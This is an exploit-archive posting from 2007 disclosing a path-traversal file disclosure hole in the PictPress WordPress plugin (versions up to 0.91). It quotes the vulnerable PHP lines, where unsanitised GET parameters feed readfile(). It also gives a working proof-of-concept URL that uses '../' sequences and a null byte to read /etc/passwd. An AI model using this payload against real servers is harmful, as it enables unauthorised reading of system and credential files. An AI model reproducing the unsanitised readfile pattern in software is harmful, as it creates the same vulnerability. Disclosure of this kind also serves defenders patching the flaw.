Wordpress Plugin PictPress <= 0.91 Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Wordpress Plugin PictPress <= 0.91 Remote File Disclosure Vulnerability
# Published : 2007-12-05
# Author : GoLd_M
# Previous Title : ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability
# Next Title : phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability

Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
    $path = $_GET['path'];
    $size = $_GET['size'];
    $base = dirname(__FILE__) . "/..";
    $cache = "$base/cache/$size/$path";
In Line 22 :
    readfile($cache);
POC :
    /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00

# www.Syue.com [2007-12-05]